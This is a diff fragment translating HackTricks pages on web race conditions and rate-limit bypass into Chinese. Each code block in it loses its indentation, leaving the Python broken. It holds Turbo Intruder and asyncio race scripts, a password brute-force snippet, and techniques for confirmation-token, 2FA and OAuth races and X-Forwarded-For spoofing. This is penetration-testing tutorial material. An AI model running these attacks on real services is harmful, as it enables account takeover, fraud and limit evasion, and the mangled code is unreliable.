+- **HTTP/1.1 '最后字节同步'**：允许预发送 20-30 个请求的大部分部分，保留一个小片段，然后一起发送，实现同时到达服务器。
 
-**Preparation for Last-Byte Sync** involves:
+**最后字节同步的准备**包括：
 
-1. Sending headers and body data minus the final byte without ending the stream.
-2. Pausing for 100ms post-initial send.
-3. Disabling TCP_NODELAY to utilize Nagle's algorithm for batching final frames.
-4. Pinging to warm up the connection.
+1. 发送头部和主体数据，去掉最后一个字节而不结束流。
+2. 在初始发送后暂停 100 毫秒。
+3. 禁用 TCP_NODELAY，以利用 Nagle 算法批处理最后的帧。
+4. 进行 ping 操作以预热连接。
 
-The subsequent sending of withheld frames should result in their arrival in a single packet, verifiable via Wireshark. This method does not apply to static files, which are not typically involved in RC attacks.
+随后发送保留的帧应以单个数据包到达，可以通过 Wireshark 验证。此方法不适用于静态文件，这些文件通常不涉及 RC 攻击。
 
-### Adapting to Server Architecture
+### 适应服务器架构
 
-Understanding the target's architecture is crucial. Front-end servers might route requests differently, affecting timing. Preemptive server-side connection warming, through inconsequential requests, might normalize request timing.
+了解目标的架构至关重要。前端服务器可能以不同方式路由请求，从而影响时序。通过无关请求进行预先的服务器端连接预热，可能会使请求时序正常化。
 
-#### Handling Session-Based Locking
+#### 处理基于会话的锁定
 
-Frameworks like PHP's session handler serialize requests by session, potentially obscuring vulnerabilities. Utilizing different session tokens for each request can circumvent this issue.
+像 PHP 的会话处理程序这样的框架按会话序列化请求，可能会掩盖漏洞。为每个请求使用不同的会话令牌可以规避此问题。
 
-#### Overcoming Rate or Resource Limits
+#### 克服速率或资源限制
 
-If connection warming is ineffective, triggering web servers' rate or resource limit delays intentionally through a flood of dummy requests might facilitate the single-packet attack by inducing a server-side delay conducive to race conditions.
+如果连接预热无效，通过大量虚假请求故意触发 Web 服务器的速率或资源限制延迟，可能会通过引发有利于竞争条件的服务器端延迟来促进单包攻击。
 
-## Attack Examples
+## 攻击示例
 
-- **Tubo Intruder - HTTP2 single-packet attack (1 endpoint)**: You can send the request to **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`), you can change in the request the value you want to brute force for **`%s`** like in `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s` and then select the **`examples/race-single-packer-attack.py`** from the drop down:
+- **Tubo Intruder - HTTP2 单包攻击 (1 个端点)**：您可以将请求发送到 **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`)，您可以在请求中更改要暴力破解的 **`%s`** 的值，例如 `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s`，然后从下拉菜单中选择 **`examples/race-single-packer-attack.py`**：
 
 <figure><img src="../images/image (57).png" alt=""><figcaption></figcaption></figure>
 
-If you are going to **send different values**, you could modify the code with this one that uses a wordlist from the clipboard:
-
+如果您要 **发送不同的值**，您可以使用这个从剪贴板中使用字典的代码进行修改：
 ```python
-    passwords = wordlists.clipboard
-    for password in passwords:
-        engine.queue(target.req, password, gate='race1')
+passwords = wordlists.clipboard
+for password in passwords:
+engine.queue(target.req, password, gate='race1')
 ```
-
 > [!WARNING]
-> If the web doesn't support HTTP2 (only HTTP1.1) use `Engine.THREADED` or `Engine.BURP` instead of `Engine.BURP2`.
-
-- **Tubo Intruder - HTTP2 single-packet attack (Several endpoints)**: In case you need to send a request to 1 endpoint and then multiple to other endpoints to trigger the RCE, you can change the `race-single-packet-attack.py` script with something like:
+> 如果网站不支持 HTTP2（仅支持 HTTP1.1），请使用 `Engine.THREADED` 或 `Engine.BURP`，而不是 `Engine.BURP2`。
 
+- **Tubo Intruder - HTTP2 单包攻击（多个端点）**：如果您需要向一个端点发送请求，然后向其他多个端点发送请求以触发 RCE，您可以将 `race-single-packet-attack.py` 脚本更改为类似：
 ```python
 def queueRequests(target, wordlists):
-    engine = RequestEngine(endpoint=target.endpoint,
-                           concurrentConnections=1,
-                           engine=Engine.BURP2
-                           )
+engine = RequestEngine(endpoint=target.endpoint,
+concurrentConnections=1,
+engine=Engine.BURP2
+)
 
-    # Hardcode the second request for the RC
-    confirmationReq = '''POST /confirm?token[]= HTTP/2
+# Hardcode the second request for the RC
+confirmationReq = '''POST /confirm?token[]= HTTP/2
 Host: 0a9c00370490e77e837419c4005900d0.web-security-academy.net
 Cookie: phpsessionid=MpDEOYRvaNT1OAm0OtAsmLZ91iDfISLU
 Content-Length: 0
 
 '''
 
-    # For each attempt (20 in total) send 50 confirmation requests.
-    for attempt in range(20):
-        currentAttempt = str(attempt)
-        username = 'aUser' + currentAttempt
+# For each attempt (20 in total) send 50 confirmation requests.
+for attempt in range(20):
+currentAttempt = str(attempt)
+username = 'aUser' + currentAttempt
 
-        # queue a single registration request
-        engine.queue(target.req, username, gate=currentAttempt)
+# queue a single registration request
+engine.queue(target.req, username, gate=currentAttempt)
 
-        # queue 50 confirmation requests - note that this will probably sent in two separate packets
-        for i in range(50):
-            engine.queue(confirmationReq, gate=currentAttempt)
+# queue 50 confirmation requests - note that this will probably sent in two separate packets
+for i in range(50):
+engine.queue(confirmationReq, gate=currentAttempt)
 
-        # send all the queued requests for this attempt
-        engine.openGate(currentAttempt)
+# send all the queued requests for this attempt
+engine.openGate(currentAttempt)
 ```
-
-- It's also available in **Repeater** via the new '**Send group in parallel**' option in Burp Suite.
-  - For **limit-overrun** you could just add the **same request 50 times** in the group.
-  - For **connection warming**, you could **add** at the **beginning** of the **group** some **requests** to some non static part of the web server.
-  - For **delaying** the process **between** processing **one request and another** in a 2 substates steps, you could **add extra requests between** both requests.
-  - For a **multi-endpoint** RC you could start sending the **request** that **goes to the hidden state** and then **50 requests** just after it that **exploits the hidden state**.
+- 该功能也可以通过 Burp Suite 中的新“**并行发送组**”选项在 **Repeater** 中使用。
+- 对于 **limit-overrun**，您可以在组中**添加相同的请求 50 次**。
+- 对于 **connection warming**，您可以在 **组的开始**添加一些请求到 web 服务器的某个非静态部分。
+- 对于在处理 **一个请求和另一个请求之间**的过程 **延迟**，您可以在两个请求之间**添加额外的请求**。
+- 对于 **multi-endpoint** RC，您可以开始发送 **请求**，该请求 **进入隐藏状态**，然后在其后 **发送 50 个请求**，这些请求 **利用隐藏状态**。
 
 <figure><img src="../images/image (58).png" alt=""><figcaption></figcaption></figure>
 
-- **Automated python script**: The goal of this script is to change the email of a user while continually verifying it until the verification token of the new email arrives to the last email (this is because in the code it was seeing a RC where it was possible to modify an email but have the verification sent to the old one because the variable indicating the email was already populated with the first one).\
-  When the word "objetivo" is found in the received emails we know we received the verification token of the changed email and we end the attack.
-
+- **自动化 Python 脚本**：该脚本的目标是更改用户的电子邮件，同时不断验证，直到新电子邮件的验证令牌到达最后一个电子邮件（这是因为在代码中看到一个 RC，可以修改电子邮件，但验证被发送到旧电子邮件，因为指示电子邮件的变量已经用第一个填充）。\
+当在收到的电子邮件中找到“objetivo”一词时，我们知道收到了更改电子邮件的验证令牌，并结束攻击。
 ```python
 # https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun
 # Script from victor to solve a HTB challenge
@@ -142,257 +137,250 @@ response = requests.get(url, verify=False)
 
 while "objetivo" not in response.text:
 
-    urlDeleteMails = "https://"+host+":"+str(puerto)+"/email/deleteall/"
+urlDeleteMails = "https://"+host+":"+str(puerto)+"/email/deleteall/"
 
-    responseDeleteMails = requests.get(urlDeleteMails, verify=False)
-    #print(response.text)
-    # change this host name to new generated one
+responseDeleteMails = requests.get(urlDeleteMails, verify=False)
+#print(response.text)
+# change this host name to new generated one
 
-    Headers = { "Cookie" : cookie, "content-type": "application/x-www-form-urlencoded" }
-    data="email=test%40email.htb&username=estes&fullName=test&antiCSRFToken="+CSRF
-    urlReset="https://"+host+":"+str(puerto)+"/challenge/api/profile"
-    responseReset = requests.post(urlReset, data=data, headers=Headers, verify=False)
+Headers = { "Cookie" : cookie, "content-type": "application/x-www-form-urlencoded" }
+data="email=test%40email.htb&username=estes&fullName=test&antiCSRFToken="+CSRF
+urlReset="https://"+host+":"+str(puerto)+"/challenge/api/profile"
+responseReset = requests.post(urlReset, data=data, headers=Headers, verify=False)
 
-    print(responseReset.status_code)
+print(responseReset.status_code)
 
-    h2_conn = H2OnTlsConnection(
-        hostname=host,
-        port_number=puerto
-    )
+h2_conn = H2OnTlsConnection(
+hostname=host,
+port_number=puerto
+)
 
-    h2_conn.setup_connection()
+h2_conn.setup_connection()
 
-    try_num = 100
+try_num = 100
 
-    stream_ids_list = h2_conn.generate_stream_ids(number_of_streams=try_num)
+stream_ids_list = h2_conn.generate_stream_ids(number_of_streams=try_num)
 
-    all_headers_frames = []  # all headers frame + data frames which have not the last byte
-    all_data_frames = []  # all data frames which contain the last byte
+all_headers_frames = []  # all headers frame + data frames which have not the last byte
+all_data_frames = []  # all data frames which contain the last byte
 
 
-    for i in range(0, try_num):
-        last_data_frame_with_last_byte=''
-        if i == try_num/2:
-            header_frames_without_last_byte, last_data_frame_with_last_byte = h2_conn.create_single_packet_http2_post_request_frames(  # noqa: E501
-                method='POST',
-                headers_string=headersObjetivo,
-                scheme='https',
-                stream_id=stream_ids_list[i],
-                authority=host,
-                body=bodyObjetivo,
-                path='/challenge/api/profile'
-            )
-        else:
-            header_frames_without_last_byte, last_data_frame_with_last_byte = h2_conn.create_single_packet_http2_post_request_frames(
-                method='GET',
-                headers_string=headersVerification,
-                scheme='https',
-                stream_id=stream_ids_list[i],
-                authority=host,
-                body=".",
-                path='/challenge/api/sendVerification'
-            )
+for i in range(0, try_num):
+last_data_frame_with_last_byte=''
+if i == try_num/2:
+header_frames_without_last_byte, last_data_frame_with_last_byte = h2_conn.create_single_packet_http2_post_request_frames(  # noqa: E501
+method='POST',
+headers_string=headersObjetivo,
+scheme='https',
+stream_id=stream_ids_list[i],
+authority=host,
+body=bodyObjetivo,
+path='/challenge/api/profile'
+)
+else:
+header_frames_without_last_byte, last_data_frame_with_last_byte = h2_conn.create_single_packet_http2_post_request_frames(
+method='GET',
+headers_string=headersVerification,
+scheme='https',
+stream_id=stream_ids_list[i],
+authority=host,
+body=".",
+path='/challenge/api/sendVerification'
+)
 
-        all_headers_frames.append(header_frames_without_last_byte)
-        all_data_frames.append(last_data_frame_with_last_byte)
+all_headers_frames.append(header_frames_without_last_byte)
+all_data_frames.append(last_data_frame_with_last_byte)
 
 
-    # concatenate all headers bytes
-    temp_headers_bytes = b''
-    for h in all_headers_frames:
-        temp_headers_bytes += bytes(h)
+# concatenate all headers bytes
+temp_headers_bytes = b''
+for h in all_headers_frames:
+temp_headers_bytes += bytes(h)
 
-    # concatenate all data frames which have last byte
-    temp_data_bytes = b''
-    for d in all_data_frames:
-        temp_data_bytes += bytes(d)
+# concatenate all data frames which have last byte
+temp_data_bytes = b''
+for d in all_data_frames:
+temp_data_bytes += bytes(d)
 
-    h2_conn.send_bytes(temp_headers_bytes)
+h2_conn.send_bytes(temp_headers_bytes)
 
-    # wait some time
-    sleep(0.1)
+# wait some time
+sleep(0.1)
 
-    # send ping frame to warm up connection
-    h2_conn.send_ping_frame()
+# send ping frame to warm up connection
+h2_conn.send_ping_frame()
 
-    # send remaining data frames
-    h2_conn.send_bytes(temp_data_bytes)
+# send remaining data frames
+h2_conn.send_bytes(temp_data_bytes)
 
-    resp = h2_conn.read_response_from_socket(_timeout=3)
-    frame_parser = h2_frames.FrameParser(h2_connection=h2_conn)
-    frame_parser.add_frames(resp)
-    frame_parser.show_response_of_sent_requests()
+resp = h2_conn.read_response_from_socket(_timeout=3)
+frame_parser = h2_frames.FrameParser(h2_connection=h2_conn)
+frame_parser.add_frames(resp)
+frame_parser.show_response_of_sent_requests()
 
-    print('---')
+print('---')
 
-    sleep(3)
-    h2_conn.close_connection()
+sleep(3)
+h2_conn.close_connection()
 
-    response = requests.get(url, verify=False)
+response = requests.get(url, verify=False)
 ```
+### 改进单包攻击
 
-### Improving Single Packet Attack
+在原始研究中解释了此攻击的限制为1,500字节。然而，在[**这篇文章**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)中，解释了如何通过使用IP层分片（将单个数据包拆分为多个IP数据包）并以不同顺序发送它们，从而扩展单包攻击的1,500字节限制到**TCP的65,535 B窗口限制**，这可以防止在所有片段到达服务器之前重新组装数据包。这项技术使研究人员能够在大约166毫秒内发送10,000个请求。&#x20;
 
-In the original research it's explained that this attack has a limit of 1,500 bytes. However, in [**this post**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/), it was explained how it's possible to extend the 1,500-byte limitation of the single packet attack to the **65,535 B window limitation of TCP by using IP layer fragmentation** (splitting a single packet into multiple IP packets) and sending them in different order, allowed to prevent reassembling the packet until all the fragments reached the server. This technique allowed the researcher to send 10,000 requests in about 166ms.&#x20;
+请注意，尽管此改进使得在需要数百/数千个数据包同时到达的RC攻击中更可靠，但它也可能存在一些软件限制。一些流行的HTTP服务器，如Apache、Nginx和Go，将`SETTINGS_MAX_CONCURRENT_STREAMS`设置为100、128和250。然而，其他如NodeJS和nghttp2则没有限制。\
+这基本上意味着Apache将只考虑来自单个TCP连接的100个HTTP连接（限制了此RC攻击）。
 
-Note that although this improvement makes the attack more reliable in RC that requiers hundreds/thousands of packets to arrive at the same time, it might also have some software limitations. Some popular HTTP servers like Apache, Nginx and Go have a strict `SETTINGS_MAX_CONCURRENT_STREAMS` setting to 100, 128 and 250. However, other like NodeJS and nghttp2 has it unlimited.\
-This basically mean that Apache will only consider 100 HTTP connections from a single TCP connection (limiting this RC attack).
+您可以在repo中找到使用此技术的一些示例[https://github.com/Ry0taK/first-sequence-sync/tree/main](https://github.com/Ry0taK/first-sequence-sync/tree/main)。
 
-You can find some examples using this tehcnique in the repo [https://github.com/Ry0taK/first-sequence-sync/tree/main](https://github.com/Ry0taK/first-sequence-sync/tree/main).
+## 原始BF
 
-## Raw BF
+在之前的研究之前，使用了一些有效载荷，这些有效载荷只是试图尽可能快地发送数据包以引发RC。
 
-Before the previous research these were some payloads used which just tried to send the packets as fast as possible to cause a RC.
-
-- **Repeater:** Check the examples from the previous section.
-- **Intruder**: Send the **request** to **Intruder**, set the **number of threads** to **30** inside the **Options menu and,** select as payload **Null payloads** and generate **30.**
+- **Repeater:** 查看上一节中的示例。
+- **Intruder**: 将**请求**发送到**Intruder**，在**选项菜单**中将**线程数**设置为**30**，并选择有效载荷为**Null payloads**并生成**30个**。
 - **Turbo Intruder**
-
 ```python
 def queueRequests(target, wordlists):
-    engine = RequestEngine(endpoint=target.endpoint,
-                           concurrentConnections=5,
-                           requestsPerConnection=1,
-                           pipeline=False
-                           )
-    a = ['Session=<session_id_1>','Session=<session_id_2>','Session=<session_id_3>']
-    for i in range(len(a)):
-        engine.queue(target.req,a[i], gate='race1')
-    # open TCP connections and send partial requests
-    engine.start(timeout=10)
-    engine.openGate('race1')
-    engine.complete(timeout=60)
+engine = RequestEngine(endpoint=target.endpoint,
+concurrentConnections=5,
+requestsPerConnection=1,
+pipeline=False
+)
+a = ['Session=<session_id_1>','Session=<session_id_2>','Session=<session_id_3>']
+for i in range(len(a)):
+engine.queue(target.req,a[i], gate='race1')
+# open TCP connections and send partial requests
+engine.start(timeout=10)
+engine.openGate('race1')
+engine.complete(timeout=60)
 
 def handleResponse(req, interesting):
-    table.add(req)
+table.add(req)
 ```
-
 - **Python - asyncio**
-
 ```python
 import asyncio
 import httpx
 
 async def use_code(client):
-    resp = await client.post(f'http://victim.com', cookies={"session": "asdasdasd"}, data={"code": "123123123"})
-    return resp.text
+resp = await client.post(f'http://victim.com', cookies={"session": "asdasdasd"}, data={"code": "123123123"})
+return resp.text
 
 async def main():
-    async with httpx.AsyncClient() as client:
-        tasks = []
-        for _ in range(20): #20 times
-            tasks.append(asyncio.ensure_future(use_code(client)))
+async with httpx.AsyncClient() as client:
+tasks = []
+for _ in range(20): #20 times
+tasks.append(asyncio.ensure_future(use_code(client)))
 
-        # Get responses
-        results = await asyncio.gather(*tasks, return_exceptions=True)
+# Get responses
+results = await asyncio.gather(*tasks, return_exceptions=True)
 
-        # Print results
-        for r in results:
-            print(r)
+# Print results
+for r in results:
+print(r)
 
-        # Async2sync sleep
-        await asyncio.sleep(0.5)
-    print(results)
+# Async2sync sleep
+await asyncio.sleep(0.5)
+print(results)
 
 asyncio.run(main())
 ```
+## **RC 方法论**
 
-## **RC Methodology**
+### 限制溢出 / TOCTOU
 
-### Limit-overrun / TOCTOU
+这是最基本的竞争条件类型，其中**漏洞**出现在**限制你可以执行某个操作次数**的地方。比如在网上商店中多次使用相同的折扣码。一个非常简单的例子可以在[**这份报告**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43)或[**这个漏洞**](https://hackerone.com/reports/759247)**中找到。**
 
-This is the most basic type of race condition where **vulnerabilities** that **appear** in places that **limit the number of times you can perform an action**. Like using the same discount code in a web store several times. A very easy example can be found in [**this report**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43) or in [**this bug**](https://hackerone.com/reports/759247)**.**
+这种攻击有许多变体，包括：
 
-There are many variations of this kind of attack, including:
+- 多次兑换礼品卡
+- 多次评价产品
+- 提取或转移超过账户余额的现金
+- 重复使用单个 CAPTCHA 解
+- 绕过反暴力破解速率限制
 
-- Redeeming a gift card multiple times
-- Rating a product multiple times
-- Withdrawing or transferring cash in excess of your account balance
-- Reusing a single CAPTCHA solution
-- Bypassing an anti-brute-force rate limit
+### **隐藏子状态**
 
-### **Hidden substates**
+利用复杂的竞争条件通常涉及利用与隐藏或**意外机器子状态**交互的短暂机会。以下是处理此问题的方法：
 
-Exploiting complex race conditions often involves taking advantage of brief opportunities to interact with hidden or **unintended machine substates**. Here’s how to approach this:
+1. **识别潜在的隐藏子状态**
+- 首先确定修改或与关键数据交互的端点，例如用户资料或密码重置过程。重点关注：
+- **存储**：优先选择操作服务器端持久数据的端点，而不是处理客户端数据的端点。
+- **操作**：寻找更可能创建可利用条件的操作，这些操作会改变现有数据，而不是添加新数据。
+- **键控**：成功的攻击通常涉及基于相同标识符的操作，例如用户名或重置令牌。
+2. **进行初步探测**
+- 使用竞争条件攻击测试识别的端点，观察是否有任何偏离预期结果的情况。意外的响应或应用程序行为的变化可能表明存在漏洞。
+3. **证明漏洞**
+- 将攻击缩小到利用漏洞所需的最少请求次数，通常仅需两个。这一步可能需要多次尝试或自动化，因为涉及精确的时机。
 
-1. **Identify Potential Hidden Substates**
-   - Start by pinpointing endpoints that modify or interact with critical data, such as user profiles or password reset processes. Focus on:
-     - **Storage**: Prefer endpoints that manipulate server-side persistent data over those handling data client-side.
-     - **Action**: Look for operations that alter existing data, which are more likely to create exploitable conditions compared to those that add new data.
-     - **Keying**: Successful attacks usually involve operations keyed on the same identifier, e.g., username or reset token.
-2. **Conduct Initial Probing**
-   - Test the identified endpoints with race condition attacks, observing for any deviations from expected outcomes. Unexpected responses or changes in application behavior can signal a vulnerability.
-3. **Demonstrate the Vulnerability**
-   - Narrow down the attack to the minimal number of requests needed to exploit the vulnerability, often just two. This step might require multiple attempts or automation due to the precise timing involved.
+### 时间敏感攻击
 
-### Time Sensitive Attacks
+请求的时机精确性可以揭示漏洞，特别是当使用可预测的方法（如时间戳）作为安全令牌时。例如，基于时间戳生成密码重置令牌可能允许同时请求相同的令牌。
 
-Precision in timing requests can reveal vulnerabilities, especially when predictable methods like timestamps are used for security tokens. For instance, generating password reset tokens based on timestamps could allow identical tokens for simultaneous requests.
+**利用方法：**
 
-**To Exploit:**
+- 使用精确的时机，例如单个数据包攻击，发起并发的密码重置请求。相同的令牌表明存在漏洞。
 
-- Use precise timing, like a single packet attack, to make concurrent password reset requests. Identical tokens indicate a vulnerability.
+**示例：**
 
-**Example:**
+- 同时请求两个密码重置令牌并进行比较。匹配的令牌表明令牌生成存在缺陷。
 
-- Request two password reset tokens at the same time and compare them. Matching tokens suggest a flaw in token generation.
+**查看这个** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) **进行尝试。**
 
-**Check this** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) **to try this.**
+## 隐藏子状态案例研究
 
-## Hidden substates case studies
+### 支付并添加项目
 
-### Pay & add an Item
+查看这个 [**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation) 了解如何在商店中**支付**并**添加一个额外**的你**不需要支付的**项目。
 
-Check this [**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation) to see how to **pay** in a store and **add an extra** item you that **won't need to pay for it**.
+### 确认其他电子邮件
 
-### Confirm other emails
+这个想法是**同时验证一个电子邮件地址并将其更改为另一个**，以找出平台是否验证了更改后的新地址。
 
-The idea is to **verify an email address and change it to a different one at the same time** to find out if the platform verifies the new one changed.
+### 将电子邮件更改为两个基于 Cookie 的电子邮件地址
 
-### Change email to 2 emails addresses Cookie based
+根据[**这项研究**](https://portswigger.net/research/smashing-the-state-machine)，Gitlab 通过这种方式容易受到接管，因为它可能**将一个电子邮件的电子邮件验证令牌发送到另一个电子邮件**。
 
-According to [**this research**](https://portswigger.net/research/smashing-the-state-machine) Gitlab was vulnerable to a takeover this way because it might **send** the **email verification token of one email to the other email**.
+**查看这个** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) **进行尝试。**
 
-**Check this** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) **to try this.**
+### 隐藏数据库状态 / 确认绕过
 
-### Hidden Database states / Confirmation Bypass
+如果使用**两个不同的写入**在**数据库**中**添加**信息，则在**仅写入第一条数据**的短暂时间内，**确认账户的令牌**可能是**空的**。例如，在创建用户时，**用户名**和**密码**可能会被**写入**，然后**确认新创建账户的令牌**被写入。这意味着在短时间内，**确认账户的令牌为 null**。
 
-If **2 different writes** are used to **add** **information** inside a **database**, there is a small portion of time where **only the first data has been written** inside the database. For example, when creating a user the **username** and **password** might be **written** and **then the token** to confirm the newly created account is written. This means that for a small time the **token to confirm an account is null**.
+因此，**注册一个账户并发送多个带有空令牌**（`token=`或`token[]=`或任何其他变体）以立即确认账户，可能允许确认一个你不控制电子邮件的**账户**。
 
-Therefore **registering an account and sending several requests with an empty token** (`token=` or `token[]=` or any other variation) to confirm the account right away could allow to c**onfirm an account** where you don't control the email.
+**查看这个** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) **进行尝试。**
 
-**Check this** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) **to try this.**
-
-### Bypass 2FA
-
-The following pseudo-code is vulnerable to race condition because in a very small time the **2FA is not enforced** while the session is created:
+### 绕过 2FA
 
+以下伪代码容易受到竞争条件的影响，因为在创建会话的非常短时间内，**2FA 并未强制执行**：
 ```python
 session['userid'] = user.userid
 if user.mfa_enabled:
-    session['enforce_mfa'] = True
-    # generate and send MFA code to user
-    # redirect browser to MFA code entry form
+session['enforce_mfa'] = True
+# generate and send MFA code to user
+# redirect browser to MFA code entry form
 ```
+### OAuth2 永久持久性
 
-### OAuth2 eternal persistence
+有几个 [**OAUth 提供者**](https://en.wikipedia.org/wiki/List_of_OAuth_providers)。这些服务允许您创建一个应用程序并验证提供者注册的用户。为此，**客户端**需要**允许您的应用程序**访问其在**OAUth 提供者**中的某些数据。\
+到此为止，只是一个常见的使用 google/linkedin/github 等的登录，您会看到一个页面提示：“_应用程序 \<InsertCoolName> 想要访问您的信息，您想允许吗？_”
 
-There are several [**OAUth providers**](https://en.wikipedia.org/wiki/List_of_OAuth_providers). Theses services will allow you to create an application and authenticate users that the provider has registered. In order to do so, the **client** will need to **permit your application** to access some of their data inside of the **OAUth provider**.\
-So, until here just a common login with google/linkedin/github... where you are prompted with a page saying: "_Application \<InsertCoolName> wants to access you information, do you want to allow it?_"
+#### `authorization_code` 中的竞争条件
 
-#### Race Condition in `authorization_code`
+**问题**出现在您**接受**它时，并自动将**`authorization_code`**发送到恶意应用程序。然后，这个**应用程序利用 OAUth 服务提供者中的竞争条件生成多个 AT/RT**（_身份验证令牌/刷新令牌_）用于您的帐户。基本上，它将利用您已接受该应用程序访问您的数据的事实来**创建多个帐户**。然后，如果您**停止允许该应用程序访问您的数据，一对 AT/RT 将被删除，但其他的仍然有效**。
 
-The **problem** appears when you **accept it** and automatically sends an **`authorization_code`** to the malicious application. Then, this **application abuses a Race Condition in the OAUth service provider to generate more that one AT/RT** (_Authentication Token/Refresh Token_) from the **`authorization_code`** for your account. Basically, it will abuse the fact that you have accept the application to access your data to **create several accounts**. Then, if you **stop allowing the application to access your data one pair of AT/RT will be deleted, but the other ones will still be valid**.
+#### `Refresh Token` 中的竞争条件
 
-#### Race Condition in `Refresh Token`
+一旦您**获得有效的 RT**，您可以尝试**利用它生成多个 AT/RT**，即使用户取消了恶意应用程序访问其数据的权限，**多个 RT 仍然有效。**
 
-Once you have **obtained a valid RT** you could try to **abuse it to generate several AT/RT** and **even if the user cancels the permissions** for the malicious application to access his data, **several RTs will still be valid.**
+## **WebSockets 中的 RC**
 
-## **RC in WebSockets**
+在 [**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC) 中，您可以找到一个 Java 的 PoC，用于并行发送 websocket 消息以利用**Web Sockets 中的竞争条件**。
 
-In [**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC) you can find a PoC in Java to send websocket messages in **parallel** to abuse **Race Conditions also in Web Sockets**.
-
-## References
+## 参考文献
 
 - [https://hackerone.com/reports/759247](https://hackerone.com/reports/759247)
 - [https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html](https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html)
@@ -406,8 +394,7 @@ In [**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC
 <figure><img src="../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) 轻松构建和**自动化工作流**，由世界上**最先进**的社区工具提供支持。\
+今天就获取访问权限： 
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}
-
diff --git a/src/pentesting-web/rate-limit-bypass.md b/src/pentesting-web/rate-limit-bypass.md
index 73a1b474a..4ae6a7695 100644
--- a/src/pentesting-web/rate-limit-bypass.md
+++ b/src/pentesting-web/rate-limit-bypass.md
@@ -3,8 +3,8 @@
 <figure><img src="../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}
 
@@ -14,16 +14,15 @@ Get Access Today:
 
 ### Exploring Similar Endpoints
 
-Attempts should be made to perform brute force attacks on variations of the targeted endpoint, such as `/api/v3/sign-up`, including alternatives like `/Sing-up`, `/SignUp`, `/singup`, `/api/v1/sign-up`, `/api/sign-up` etc.
+应尝试对目标端点的变体进行暴力攻击，例如 `/api/v3/sign-up`，包括 `/Sing-up`、`/SignUp`、`/singup`、`/api/v1/sign-up`、`/api/sign-up` 等替代方案。
 
 ### Incorporating Blank Characters in Code or Parameters
 
-Inserting blank bytes like `%00`, `%0d%0a`, `%0d`, `%0a`, `%09`, `%0C`, `%20` into code or parameters can be a useful strategy. For example, adjusting a parameter to `code=1234%0a` allows for extending attempts through variations in input, like adding newline characters to an email address to get around attempt limitations.
+在代码或参数中插入空字节，如 `%00`、`%0d%0a`、`%0d`、`%0a`、`%09`、`%0C`、`%20`，可以是一种有用的策略。例如，将参数调整为 `code=1234%0a` 允许通过输入的变体扩展尝试，例如在电子邮件地址中添加换行符以绕过尝试限制。
 
 ### Manipulating IP Origin via Headers
 
-Modifying headers to alter the perceived IP origin can help evade IP-based rate limiting. Headers such as `X-Originating-IP`, `X-Forwarded-For`, `X-Remote-IP`, `X-Remote-Addr`, `X-Client-IP`, `X-Host`, `X-Forwared-Host`, including using multiple instances of `X-Forwarded-For`, can be adjusted to simulate requests from different IPs.
-
+修改头部以改变感知的 IP 来源可以帮助规避基于 IP 的速率限制。可以调整 `X-Originating-IP`、`X-Forwarded-For`、`X-Remote-IP`、`X-Remote-Addr`、`X-Client-IP`、`X-Host`、`X-Forwared-Host` 等头部，包括使用多个 `X-Forwarded-For` 实例，以模拟来自不同 IP 的请求。
 ```bash
 X-Originating-IP: 127.0.0.1
 X-Forwarded-For: 127.0.0.1
@@ -37,38 +36,36 @@ X-Forwared-Host: 127.0.0.1
 X-Forwarded-For:
 X-Forwarded-For: 127.0.0.1
 ```
+### 更改其他头部
 
-### Changing Other Headers
